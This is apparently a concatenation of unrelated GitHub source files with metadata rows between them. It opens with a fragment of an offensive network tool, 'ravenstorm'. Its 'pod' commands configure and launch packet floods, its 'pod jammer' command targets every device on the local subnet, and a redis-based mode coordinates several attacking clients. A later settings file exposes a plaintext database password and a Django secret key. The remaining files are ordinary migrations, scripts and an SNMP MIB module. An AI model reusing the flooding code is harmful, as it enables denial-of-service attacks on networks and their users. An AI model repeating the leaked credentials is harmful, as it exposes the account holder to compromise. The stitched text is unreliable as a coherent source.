listportslist = inporarg('PORTList split by ", "', "set listport", com).split(', ')
listportstrue = "true"
except:
print("Error")
print("")
elif 'server start' in com:
if hip != "" and hport != "":
com = ""
try:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("clid", "1")
hr.set("onrung", "false")
hr.set("com", "")
hserver = True
print("\033[1;32;40m\nServer started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
else:
print("\033[1;32;40m\nIp or/and port not definied.\n")
elif 'client connect' in com:
if hserver:
print("\033[1;32;40m\nCant listen, if already hosting.\n")
else:
com = ""
if hip != "" and hport != "":
try:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("com", "")
myclid = str(hr.get("clid"))
hr.set("clid", str(int(myclid) + 1))
hr.set(("clid" + str(myclid)), "0")
hclient = True
print("\033[1;32;40m\nClient started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
else:
print("\033[1;32;40m\nNo ip and/or port definied.\n")
elif 'server ip' in com:
print(" ")
hip = inporarg("Ip", "server ip", com)
print(" ")
elif 'server port' in com:
print(" ")
hport = inporarg("Port", "server port", com)
print(" ")
elif 'lan scan' in com:
print(" ")
if nmapinstalledq:
lanscan()
else:
print("Please install nmap.")
print(" ")
elif 'hbi' in com:
print(" ")
try:
zw = (inporarg("Domain", "hbi", com).replace("https://", "").replace("http://", ""))
print(hbi(zw))
except:
print(" Error.")
print(" ")
elif 'speed down' in com:
print("")
print(" Result: %s" % speedtest(inporarg("Website", "speed down", com)))
print("")
elif 'speed ping' in com:
print("")
print(" Result: %s" % speedping(inporarg("Ip", "speed ping", com)))
print("")
elif 'bt scan' in com:
print(" ")
try:
pass
#os.system("hcitool scan")
#os.system("hciconfig -a")
except:
print("Error.")
print(" ")
elif "pod sleep" in com:
print(" ")
try:
podsleep = float(inporarg("Delay", "pod sleep", com))
except:
print("Error.")
print(" ")
elif "pod interval" in com:
print(" ")
try:
podinterval = float(inporarg("Delay", "pod interval", com))
except:
print("Error.")
print(" ")
elif "pod threads" in com:
print(" ")
try:
podthreads = int(inporarg("Threads", "pod threads", com))
except:
print("Error.")
print(" ")
elif 'pod target list' in com:
print(" ")
try:
podtarget = inporarg("List of Domains/Ips split by ', '", "pod target list", com).split(", ")
except:
print("Error.")
print(" ")
elif "pod target" in com:
print(" ")
try:
podtarget = str(inporarg("Domain or ip", "pod target", com))
except:
print("Error.")
print(" ")
elif 'pod size' in com:
print(" ")
try:
podsizezw = int(inporarg("Size in kb", "pod size", com))
if podsizezw < podminsize:
print("Size needs to be more than 4kb.")
elif podsizezw > podmaxsize:
print("Size needs to be less than 65500kb.")
else:
podsize = podsizezw
except:
print("Error.")
print(" ")
elif 'pod checking' == com:
podtesting(podsize, podtarget, podthreads, podsleep, podinterval, podautodl)
elif 'pod run' == com:
#lister
if podsize != podsizelisterstandard:
lister = listeradd("podsize", podsize, lister)
if podthreads != podthreadslisterstandard:
lister = listeradd("podthreads", podthreads, lister)
if podsleep != podsleeplisterstandard:
lister = listeradd("podsleep", podsleep, lister)
if podinterval != podsleeplisterstandard:
lister = listeradd("podinterval", podinterval, lister)
if podautodl != podautodllisterstandard:
lister = listeradd("podautodl", podautodl, lister)
try:
pickle.dump(lister, open("ravenstorm-automated-list.ravenstormlist", "w"))
except:
pass
#print(" ")
agreed()
#print("Running...")
pod(podsize, podtarget, podthreads, podsleep, podinterval, podautodl)
elif "pod jammer" in com:
print(" ")
try:
gateways = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
gateways.connect(("8.8.8.8", 80))
gateway = ".".join((gateways.getsockname()[0].split("."))[:len(gateways.getsockname()[0].split(".")) - 1])
podlocalip = gateways.getsockname()[0]
gateways.close()
nm.scan(hosts=("%s.0/24" % gateway), arguments="-sP")
lanscandev = [(x) for x in nm.all_hosts()]
podtarget = []
for lanscandevice in lanscandev:
#print(lanscandevice)
if lanscandevice != podlocalip and lanscandevice != ("%s.1" % gateway):
#print(lanscandevice)
podtarget.append(lanscandevice)
print("All devices in Internet targeted.", podtarget)
except Exception as e:
if not nmapinstalledq:
print("Please install nmap.")
else:
print("Error.", e)
print(" ")
elif com == "clear" or com == "clear ":
os.system("clear")
elif "post scan" in com:
print("")
beautifulsoupexist = False
try:
from bs4 import BeautifulSoup
beautifulsoupexist = True
except:
print(" Please install BeautifulSoup4.")
lxmlexist = False
try:
import lxml
lxmlexist = True
except:
print(" Please install lxml.")
if beautifulsoupexist and lxmlexist:
postscanurl = str(inporarg("Domain", "post scan", com))
if "http" not in postscanurl:
print(" Error, try with https or http.")
raise Exception("httperror")
print("")
print(" Scanning...")
try:
postscan = requests.get(postscanurl)
postsoup = BeautifulSoup(postscan.content, "lxml")
print(" Results:")
for postscanx in postsoup.find_all("form"):
for postscanl in postscanx.find_all(["input", "button", "text"]):
try:
print(" %s :: %s" % (postscanl.name, postscanl.get("name")))
except:
pass
except:
print(" Error.")
print("")
elif com == "redis run" or com == "redis run ":
os.system("redis-server ./redis-conf/linux/other-redis.conf || redis-server")
elif com == "redis run hide" or com == "redis run hide":
print(" Running as thread in background.")
Thread(target=redisinbackground).start()
elif ">> " in com:
os.system(com[3:])
elif com == "":
pass
else:
if 'help' not in com:
print("""\033[1;32;40m
No such command.
""")
if hclient:
if verbosed:
print("[Clientid: Done]")
try:
hr.set(("clid" + str(myclid)), "1")
except:
print("\033[1;32;40m\nError.\n")
if hserver:
if verbosed:
print("[Set Variables]")
try:
# define local vars
if "set port" in com:
hr.set("port", port)
if "set threads" in com:
hr.set("threads", threads)
if "set ip" in com:
hr.set("ip", ip)
if "set web" in com:
hr.set("ip", ip)
if "set message" in com:
hr.set("messages", messages)
if "set r" in com:
hr.set("rtxt", rtxt)
hr.set("rtxtzw", rtxtzw)
hr.set("messages", messages)
hr.set("messageszw", messageszw)
if "set sleep" in com:
hr.set("sleepy", sleepy)
if "st wait" in com:
hr.set("timeforstress", timeforstress)
if "auto step" in com:
hr.set("autostep", autostep)
if "auto start" in com:
hr.set("autostart", autostart)
if "auto stop" in com:
hr.set("autostop", autostop)
if "set mb" in com:
hr.set("setmb", setmb)
if "set listweb" in com:
hr.set("listweblist", listweblist)
if "set listport" in com:
hr.set("listportslist", listportslist)
if "method" in com:
hr.set("method", socketmethod)
hr.set("listwebtrue", listwebtrue)
time.sleep(1)
if verbosed:
print("[Done: True]")
hr.set("sdone", "true")
time.sleep(0.3)
except:
print("\033[1;32;40m\nError.\n")
if hserver and com != "":
if verbosed:
print("[Wait for other Clients]")
try:
hr.set("com", com)
loopchecker = True
while loopchecker:
time.sleep(0.2)
loopingtt = True
for t in range((int(hr.get("clid")) - 1)):
t = (t + 1)
#print(hr.get(("clid" + str(t))))
#print(t)
if hr.get(("clid" + str(t))) != "1":
loopingtt = False
#print(loopingtt)
if loopingtt:
for f in range((int(hr.get("clid")) - 1)):
f = (f + 1)
#reset
hr.set(("clid" + str(f)), "0")
hr.set("com", "")
loopchecker = False
break
hr.set("com", "")
hr.set("onrung", "false")
except:
print("\033[1;32;40mFailed to send command...\n")
| [
"noreply@github.com"
] | noreply@github.com |
ca233501fb5c9fda5f913bf4b8585651b383ef8a | 5ad3cdae21d6a594d2e499406bd3159c9e635ce8 | /yatube/posts/migrations/0005_auto_20210607_1847.py | e5b204084a85b0f5de89704ec3e5acc475a3829e | [] | no_license | Priest-4612/hw05_final | 18e24058a29de7b4533f8a1098210998277ace5b | 2ab6809b36a7c2f42c14a33deedca7cf8ce1cdf5 | refs/heads/master | 2023-06-15T00:50:48.783136 | 2021-07-12T18:39:31 | 2021-07-12T18:39:31 | 382,963,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # Generated by Django 2.2.9 on 2021-06-07 15:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0004_auto_20210530_0018'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ['-pub_date']},
),
]
| [
"prie4612@gmail.com"
] | prie4612@gmail.com |
67f524f456ca9e7e1feca8663cf6713d9eca575c | 18670f3ce7e626a60423df66e090044054f35488 | /desy_r/private/secretsettings.py | b9019ce36c8f3917c03334e96365999a0558500d | [] | no_license | camrock1/desy-reporting | b64d5dd467a2f20c796c1382e1e3fbe857587a0f | c523dea758f22e3ee5c1a581bc78940665a1696a | refs/heads/master | 2022-02-12T16:43:01.044690 | 2016-11-04T02:38:27 | 2016-11-04T02:38:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | AWS_RDS_USER = 'alexlanders'
AWS_RDS_PASS = 'Manf0rd123'
S_KEY = '-#2^f&v4_0nd!6%9oi*stx1pb6ja=fuoyv%1kg_d=ypia*9(7+' | [
"alex.landers@me.com"
] | alex.landers@me.com |
56da23f9a0d297df1b7ab5e52d14a535ed9dc9fe | 6113c356eb4fae7bfb04c4bd2b121f130ef41a14 | /content/migrations/0022_projects_direction.py | 2ea9195795802a911667d7d1035d9100af739cdf | [] | no_license | slonidet/avcsite | 4e8950296551e80003a5f76b934a043b8fd2f02e | 8034a75bbe8f2e2973761502413df76e918e1c2b | refs/heads/master | 2020-06-17T19:37:43.085881 | 2016-11-29T14:40:03 | 2016-11-29T14:40:03 | 74,976,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,298 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-11-25 10:52
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('content', '0021_remove_projects_direction'),
]
operations = [
migrations.AddField(
model_name='projects',
name='direction',
field=models.CharField(choices=[('SOC', '\u0421\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435'), ('SOB', '\u0421\u043e\u0431\u044b\u0442\u0438\u0439\u043d\u043e\u0435'), ('MED', '\u041c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u043e\u0435'), ('KUL', '\u041a\u0443\u043b\u044c\u0442\u0443\u0440\u043d\u043e-\u043f\u0440\u043e\u0441\u0432\u0435\u0442\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0435'), ('KOR', '\u041a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435'), ('SER', '\u0421\u0435\u0440\u0435\u0431\u0440\u044f\u043d\u043e\u0435'), ('OBR', '\u0412 \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0438'), ('OTH', '\u0414\u0440\u0443\u0433\u043e\u0435')], default='OTH', max_length=5, verbose_name='\u041d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430'),
),
]
| [
"dmitrysulin@gmail.com"
] | dmitrysulin@gmail.com |
81c12aa06351a46d66c2728acf26102e592fa5da | 3abd7d66e5e3923383faaef19ff2cf8f1bd5f72e | /evaluate.py | 6ac5ea4412305a1c657353c9b256c5f3b061f87d | [] | no_license | Piaktipik/RVSS_Workshop | 9af190873bff179b3529bb3533262165bcf23109 | 35b5c822ef6da91e73be9322c9354aa62234cb31 | refs/heads/master | 2023-02-27T17:47:25.693839 | 2021-02-05T00:34:35 | 2021-02-05T00:34:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | #!/usr/bin/env python3
import ast
import numpy as np
import json
#
def parse_groundtruth(fname: str) -> dict:
with open(fname,'r') as f:
gt_dict = ast.literal_eval(f.readline())
aruco_dict = {}
for key in gt_dict:
aruco_dict[key] = np.reshape([gt_dict[key]["x"], gt_dict[key]["y"]], (2,1))
return aruco_dict
def parse_user_fruit(fname: str) -> dict:
with open(fname, 'r') as f:
usr_dict = ast.literal_eval(f.read())
fruit_dict = {}
for f in usr_dict:
fruit_dict[f] = np.reshape([usr_dict[f][0],usr_dict[f][1]], (2,1))
return fruit_dict
def match_aruco_points(aruco0: dict, aruco1: dict):
missing_fruit = []
points0 = []
points1 = []
keys = []
for key in aruco1:
if not key in aruco0:
missing_fruit.append(key)
continue
if np.isnan(aruco0[key][0]) or np.isnan(aruco0[key][1]):
missing_fruit+=1
continue
points0.append(aruco0[key])
points1.append(aruco1[key])
keys.append(key)
return np.hstack(points0), np.hstack(points1), missing_fruit, keys
def parse_user_fruit(fname : str) -> dict:
with open(fname, 'r') as f:
usr_dict = ast.literal_eval(f.read())
fruit_dict = {}
for f in usr_dict:
fruit_dict[f] = np.reshape([usr_dict[f][0],usr_dict[f][1]], (2,1))
return fruit_dict
def solve_umeyama2d(points1, points2):
# Solve the optimal transform such that
# R(theta) * p1_i + t = p2_i
assert(points1.shape[0] == 2)
assert(points1.shape[0] == points2.shape[0])
assert(points1.shape[1] == points2.shape[1])
# Compute relevant variables
num_points = points1.shape[1]
mu1 = 1/num_points * np.reshape(np.sum(points1, axis=1),(2,-1))
mu2 = 1/num_points * np.reshape(np.sum(points2, axis=1),(2,-1))
sig1sq = 1/num_points * np.sum((points1 - mu1)**2.0)
sig2sq = 1/num_points * np.sum((points2 - mu2)**2.0)
Sig12 = 1/num_points * (points2-mu2) @ (points1-mu1).T
# Sig12 = 1/num_points * (points2-mu2) @ (points1-mu1).T @ np.linalg.pinv((points1-mu1)@(points1-mu1).T)
# Use the SVD for the rotation
U, d, Vh = np.linalg.svd(Sig12)
S = np.eye(2)
if np.linalg.det(Sig12) < 0:
S[-1,-1] = -1
# Return the result as an angle and a 2x1 vector
R = U @ S @ Vh
theta = np.arctan2(R[1,0],R[0,0])
x = mu2 - R @ mu1
return theta, x
def apply_transform(theta, x, points):
# Apply an SE(2) transform to a set of 2D points
assert(points.shape[0] == 2)
c, s = np.cos(theta), np.sin(theta)
R = np.array(((c, -s), (s, c)))
points_transformed = R @ points + x
return points_transformed
def compute_rmse(points1, points2):
# Compute the RMSE between two matched sets of 2D points.
assert(points1.shape[0] == 2)
assert(points1.shape[0] == points2.shape[0])
assert(points1.shape[1] == points2.shape[1])
num_points = points1.shape[1]
residual = (points1-points2).ravel()
MSE = 1.0/num_points * np.sum(residual**2)
return np.sqrt(MSE)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser("Solve the RVSS alignment problem")
parser.add_argument("groundtruth", type=str, help="The ground truth file name.")
parser.add_argument("estimate", type=str, help="The estimate file name.")
args = parser.parse_args()
gt_aruco = parse_groundtruth(args.groundtruth)
us_aruco = parse_user_fruit(args.estimate)
us_vec, gt_vec, missing, taglist = match_aruco_points(us_aruco, gt_aruco)
rmse = compute_rmse(us_vec, gt_vec)
print("The RMSE before alignment: {}".format(rmse))
theta, x = solve_umeyama2d(us_vec, gt_vec)
us_vec_aligned = apply_transform(theta, x, us_vec)
print("The following parameters optimally transform the estimated points to the ground truth.")
print("Rotation Angle: {}".format(theta))
print("Translation Vector: ({}, {})".format(x[0,0], x[1,0]))
rmse = compute_rmse(us_vec_aligned, gt_vec)
print("Successfully detect {} kinds of fruits, missing {}".format(4-len(missing), missing))
print("The RMSE after alignment: {}".format(rmse))
mark = (100-25*len(missing))*(1.05-rmse/2)
print()
print("Pred Fruit")
print(taglist)
print("Real Locations")
print("np.array("+np.array2string(gt_vec, precision=4, separator=',')+')')
print("Aligned Pred Locations")
print("np.array("+np.array2string(us_vec_aligned, precision=4, separator=',')+')')
print("The final mark is {}".format(mark))
| [
"u6139430@anu.edu.au"
] | u6139430@anu.edu.au |
72e9179d8da40397dd4755d7c720ec0e48a57713 | 8fd559be6696d8913e60e9b8628c064305a828bd | /fruit/models.py | cb2399f1c5dc6965539d6864452b4e3562ea08fe | [] | no_license | shravanchandra/farmapp | 003bfd14804ae1b5026e3bd64b07891d5402ab3b | 8bbedf218660790497cae7d21b8092e4b39d490e | refs/heads/master | 2021-01-25T16:10:10.191844 | 2016-04-03T11:07:20 | 2016-04-03T11:07:20 | 51,570,353 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | from django.db import models
from django.contrib.auth.models import User
from root.models import *
from api.models import *
# Create your models here.
class Fruit_Transaction(models.Model):
description = models.TextField()
farm = models.ForeignKey(Farming)
day = models.DateField()
delivery = models.ForeignKey(Delivery)
user = models.ForeignKey(User)
price = models.FloatField()
no_of_units_sold = models.IntegerField()
yields = models.ForeignKey(Yield)
| [
"Shravan.Kumar@polestartechnologyltd.com"
] | Shravan.Kumar@polestartechnologyltd.com |
b0445f7811e97fb43d9cdb3bfdad9449cab3f128 | e6376e614dbf63df8381af0333c81af5b1434bec | /python/08makechange_ice.py | 4eb6d4d5d7991fa90edaafc0c55a5e17846629ad | [] | no_license | billhowland/PythonLabs | 215082b56e17c5454e6e40a64ef44a55ae7ba689 | b287cefd64ed5f30b6e9db65fc9cd895e2f7da6e | refs/heads/master | 2021-06-24T23:53:41.265111 | 2019-05-28T02:02:17 | 2019-05-28T02:02:17 | 168,642,589 | 2 | 0 | null | 2021-06-10T21:23:57 | 2019-02-01T04:34:20 | Python | UTF-8 | Python | false | false | 832 | py | # makechange_ice.py
print('This program calculates coins for making change')
run = 1
while(run):
while True:
total = input('Enter the amount > ').strip().strip('$')
try:
total = (float(total)) * 100
if total < 0:
raise ValueError
break
except ValueError:
print('Enter positive numbers only, dude.')
q = (total // 25)
print((str(round(q))) + (' Quarters'))
remaind = total - (q * 25)
d = (remaind // 10)
print((str(round(d))) + (' Dimes'))
remainn = remaind - (d * 10)
n = (remainn // 5)
print((str(round(n))) + (' Nickles'))
remainp = remainn - (n * 5)
p = (remainp // 1)
print((str(round(p))) + (' Pennies'))
ask = input('Quit? Y/N > ').strip().lower()
if ask == 'y':
run = 0
| [
"electronzero@comcast.net"
] | electronzero@comcast.net |
004c56bd494899dd28e119a7a35e0bbae4c986b5 | e99509d3239513e37742646632352d914f1132cf | /stability-1/bgpstream_stability.py | 6dad3e78a00a02b8e566d24841a76c0e77904db3 | [] | no_license | CAIDA/bgp-hackathon | 4c8eab6be2c28576dc6953837711a504f47af2e0 | b95cfd0d6b22f6d61f81e3eca93e177b3d08ae21 | refs/heads/master | 2021-01-17T07:02:35.859766 | 2016-06-20T21:06:48 | 2016-06-20T21:06:48 | 43,771,622 | 29 | 11 | null | 2016-03-07T23:02:00 | 2015-10-06T18:53:52 | Perl | UTF-8 | Python | false | false | 5,418 | py | #!/usr/bin/env python
#
# Copyright (C) 2015
# Authors: Nathan Owens & Andrew Mulhern
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
import sys
import json
import copy
import math
import urllib
import multiprocessing
from _pybgpstream import BGPStream, BGPRecord, BGPElem
from collections import defaultdict
from datetime import datetime
def deal_with_time_bucket_junk(prefix, timestamp):
if prefix not in raw_bgp_stream_data:
newBuckets = copy.deepcopy(buckets)
raw_bgp_stream_data[prefix] = newBuckets
duration = timestamp - stream_start
bucket = int(duration / 300)
try:
raw_bgp_stream_data[prefix][bucket]["count"] += 1
except:
pass
def create_time_buckets(start, end):
time_step = 300 # 5 multiprocessing
buckets = []
for x in xrange(start, end, time_step):
new_end = x + 300
window = {"start": x, "end": new_end, "count": 0}
buckets.append(window)
return buckets
def get_ripe_probes(prefix_list):
def get_probe_list(ip_proto, prefix_data, return_dict):
prefix = prefix_data[0]
count = prefix_data[1]
bucket_data = prefix_data[2]
url = "https://atlas.ripe.net/api/v1/probe/?format=json&prefix_%s=%s" % (ip_proto, prefix)
probe_data = json.loads(urllib.urlopen(url).read())
probe_count = probe_data["meta"]["total_count"]
probe_ids = []
if probe_count > 0:
for probe in probe_data["objects"]:
probe_id = probe["id"]
probe_ids.append(probe_id)
if len(probe_ids) > 0:
return_dict[prefix] = {"count": count, "bucket_data": bucket_data, "probe_count": probe_count, "probe_ids": probe_ids}
return
jobs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
for prefix_data in prefix_list:
prefix = prefix_data[0]
if "." in prefix:
job = multiprocessing.Process(target=get_probe_list, args=("v4", prefix_data, return_dict))
elif ":" in prefix:
job = multiprocessing.Process(target=get_probe_list, args=("v6", prefix_data, return_dict))
jobs.append(job)
job.start()
for job in jobs:
job.join()
return dict(return_dict)
if __name__ == "__main__":
try:
stream_start = int(sys.argv[1])
stream_end = int(sys.argv[2])
out_file_name = sys.argv[3]
except:
print "Usage: %s [start time] [end time] [output file name]" %(sys.argv[0])
exit()
#stream_start = 1454284800
#stream_end = 1454288400
buckets = create_time_buckets(stream_start, stream_end)
prefixList = []
raw_bgp_stream_data = {}
stream = BGPStream()
rec = BGPRecord()
stream.add_filter('collector', 'rrc06')
stream.add_filter('record-type', 'updates')
stream.add_interval_filter(stream_start, stream_end)
stream.start()
while(stream.get_next_record(rec)):
elem = rec.get_next_elem()
while(elem):
prefix = elem.fields.get("prefix", "")
time_stamp = rec.time # unix epoc timestamp 1427846670
if prefix != "":
deal_with_time_bucket_junk(prefix, time_stamp)
elem = rec.get_next_elem()
for prefix in list(raw_bgp_stream_data):
for bucket in list(raw_bgp_stream_data[prefix]):
if bucket["count"] < 3:
raw_bgp_stream_data[prefix].remove(bucket)
for prefix in raw_bgp_stream_data:
index = 0
max_index = 0
max_val = 0
last_val = 0
for bucket in raw_bgp_stream_data[prefix]:
curr = bucket["count"]
if curr > last_val:
max_val = curr
index += 1
last_val = curr
if raw_bgp_stream_data[prefix]:
prefixList.append((prefix, max_val, raw_bgp_stream_data[prefix][max_index]))
prefixListWithProbes = get_ripe_probes(prefixList)
import get_probe_data
results = []
for prefix, values in prefixListWithProbes.iteritems():
start_time = values["bucket_data"]["start"]
end_time = values["bucket_data"]["end"]
count = values["count"]
probe_list = values["probe_ids"]
for probe in probe_list:
packet_loss = get_probe_data.get_packet_loss(probe, start_time, end_time)
results.append({"prefix":prefix, "count":count, "start_time":start_time, "end_time":end_time, "probe":probe, "packet_loss":packet_loss})
sorted_results = list(sorted(results, reverse=True, key = lambda x: (x["count"], x["packet_loss"])))
out_file = open(out_file_name, "w")
out_file.write(json.dumps(sorted_results, indent=3))
out_file.close()
| [
"Nathan_Owens@cable.comcast.com"
] | Nathan_Owens@cable.comcast.com |
65833106612dba86e94d7134a9ebee17684ede08 | a7f16c95f973905e880ad4dc277fbba890486654 | /wildlifecompliance/migrations/0549_callemail_dead.py | ceb5034f13c1d94a0e1fcfc6c4f99e9b1da06457 | [
"Apache-2.0"
] | permissive | dbca-wa/wildlifecompliance | 9e98e9c093aeb25dbb7ff8d107be47e29bcd05e1 | cb12ad9ea1171f10b5297cdb7e1eb6ea484e633d | refs/heads/master | 2023-08-08T14:37:05.824428 | 2023-07-31T02:57:23 | 2023-07-31T02:57:23 | 232,276,030 | 1 | 17 | NOASSERTION | 2023-07-31T02:57:24 | 2020-01-07T08:12:53 | Python | UTF-8 | Python | false | false | 466 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-11-17 04:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wildlifecompliance', '0548_callemail_call_type'),
]
operations = [
migrations.AddField(
model_name='callemail',
name='dead',
field=models.BooleanField(default=False),
),
]
| [
"thakurpriya1990@gmail.com"
] | thakurpriya1990@gmail.com |
bc264dca1a83cbfdac6a1a6a8e809acd0f706f6c | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/BGP4-MIB.py | 82ca958d84278f8a01207e0ae3316c34872f82b6 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 25,509 | py | #
# PySNMP MIB module BGP4-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/BGP4-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:35:09 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Unsigned32, Counter32, ModuleIdentity, MibIdentifier, NotificationType, Gauge32, Integer32, iso, Bits, TimeTicks, IpAddress, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, mib_2 = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "Counter32", "ModuleIdentity", "MibIdentifier", "NotificationType", "Gauge32", "Integer32", "iso", "Bits", "TimeTicks", "IpAddress", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "mib-2")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
bgp = ModuleIdentity((1, 3, 6, 1, 2, 1, 15))
if mibBuilder.loadTexts: bgp.setLastUpdated('9405050000Z')
if mibBuilder.loadTexts: bgp.setOrganization('IETF BGP Working Group')
if mibBuilder.loadTexts: bgp.setContactInfo(' John Chu (Editor) Postal: IBM Corp. P.O.Box 218 Yorktown Heights, NY 10598 US Tel: +1 914 945 3156 Fax: +1 914 945 2141 E-mail: jychu@watson.ibm.com')
if mibBuilder.loadTexts: bgp.setDescription('The MIB module for BGP-4.')
bgpVersion = MibScalar((1, 3, 6, 1, 2, 1, 15, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpVersion.setStatus('current')
if mibBuilder.loadTexts: bgpVersion.setDescription('Vector of supported BGP protocol version numbers. Each peer negotiates the version from this vector. Versions are identified via the string of bits contained within this object. The first octet contains bits 0 to 7, the second octet contains bits 8 to 15, and so on, with the most significant bit referring to the lowest bit number in the octet (e.g., the MSB of the first octet refers to bit 0). If a bit, i, is present and set, then the version (i+1) of the BGP is supported.')
bgpLocalAs = MibScalar((1, 3, 6, 1, 2, 1, 15, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpLocalAs.setStatus('current')
if mibBuilder.loadTexts: bgpLocalAs.setDescription('The local autonomous system number.')
bgpPeerTable = MibTable((1, 3, 6, 1, 2, 1, 15, 3), )
if mibBuilder.loadTexts: bgpPeerTable.setStatus('current')
if mibBuilder.loadTexts: bgpPeerTable.setDescription('BGP peer table. This table contains, one entry per BGP peer, information about the connections with BGP peers.')
bgpPeerEntry = MibTableRow((1, 3, 6, 1, 2, 1, 15, 3, 1), ).setIndexNames((0, "BGP4-MIB", "bgpPeerRemoteAddr"))
if mibBuilder.loadTexts: bgpPeerEntry.setStatus('current')
if mibBuilder.loadTexts: bgpPeerEntry.setDescription('Entry containing information about the connection with a BGP peer.')
bgpPeerIdentifier = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerIdentifier.setStatus('current')
if mibBuilder.loadTexts: bgpPeerIdentifier.setDescription("The BGP Identifier of this entry's BGP peer.")
bgpPeerState = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("idle", 1), ("connect", 2), ("active", 3), ("opensent", 4), ("openconfirm", 5), ("established", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerState.setStatus('current')
if mibBuilder.loadTexts: bgpPeerState.setDescription('The BGP peer connection state.')
bgpPeerAdminStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("stop", 1), ("start", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerAdminStatus.setStatus('current')
if mibBuilder.loadTexts: bgpPeerAdminStatus.setDescription("The desired state of the BGP connection. A transition from 'stop' to 'start' will cause the BGP Start Event to be generated. A transition from 'start' to 'stop' will cause the BGP Stop Event to be generated. This parameter can be used to restart BGP peer connections. Care should be used in providing write access to this object without adequate authentication.")
bgpPeerNegotiatedVersion = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerNegotiatedVersion.setStatus('current')
if mibBuilder.loadTexts: bgpPeerNegotiatedVersion.setDescription('The negotiated version of BGP running between the two peers.')
bgpPeerLocalAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 5), IpAddress()).setMaxAccess("readonly")
